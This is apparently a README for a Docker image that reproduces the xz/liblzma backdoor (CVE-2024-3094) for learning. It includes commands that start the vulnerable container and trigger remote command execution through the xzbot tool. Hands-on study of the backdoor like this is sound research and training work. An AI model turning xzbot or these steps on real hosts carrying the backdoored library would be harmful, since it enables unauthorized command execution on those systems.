xz backdoor container image

The container image of xz backdoor (CVE-2024-3094) based on an amazing work from @amlweems's xzbot project that can be run on both x86_64 and Apple Silicon (via QEMU or rosetta).

THIS IS FOR LEARNING PURPOSE ONLY!

Demo

Overview

The xz-backdoor container images don't rely on systemd due to the fact that the exploit can be triggered with only just sshd if certain conditions are met. As a result, it allows us to start the container without --privileged flag which is considered insecure.

Versions

Both versions of the xz-backdoor are available as image tags.

• 5.6.0
• 5.6.1 (latest)

Getting started

Prerequisites

• docker or podman.
• Read xzbot's documentation.

Usage

1. Start the container image

Tip

A specific version of liblzma can be specified via image tag e.g. rezigned/xz-backdoor:5.6.0.

docker run --rm -it -d \
  --name xz-backdoor \
  --platform linux/amd64 \
  rezigned/xz-backdoor:latest

2. Run a command via xzbot

Note

The output of the default command (id) is redirected to /tmp/.xz.

See https://github.com/amlweems/xzbot for more details.

# default command `id > /tmp/.xz`
docker exec -it `docker ps -f name=xz-backdoor -q` ./xzbot

# custom command
docker exec -it `docker ps -f name=xz-backdoor -q` ./xzbot -cmd "uname -a > /tmp/.xz"

Acknowledgements

• https://edofic.com/posts/2021-09-12-podman-m1-amd64/
• https://github.com/amlweems/xzbot
• https://www.openwall.com/lists/oss-security/2024/03/29/4
• https://github.com/LewisGaul/systemd-containers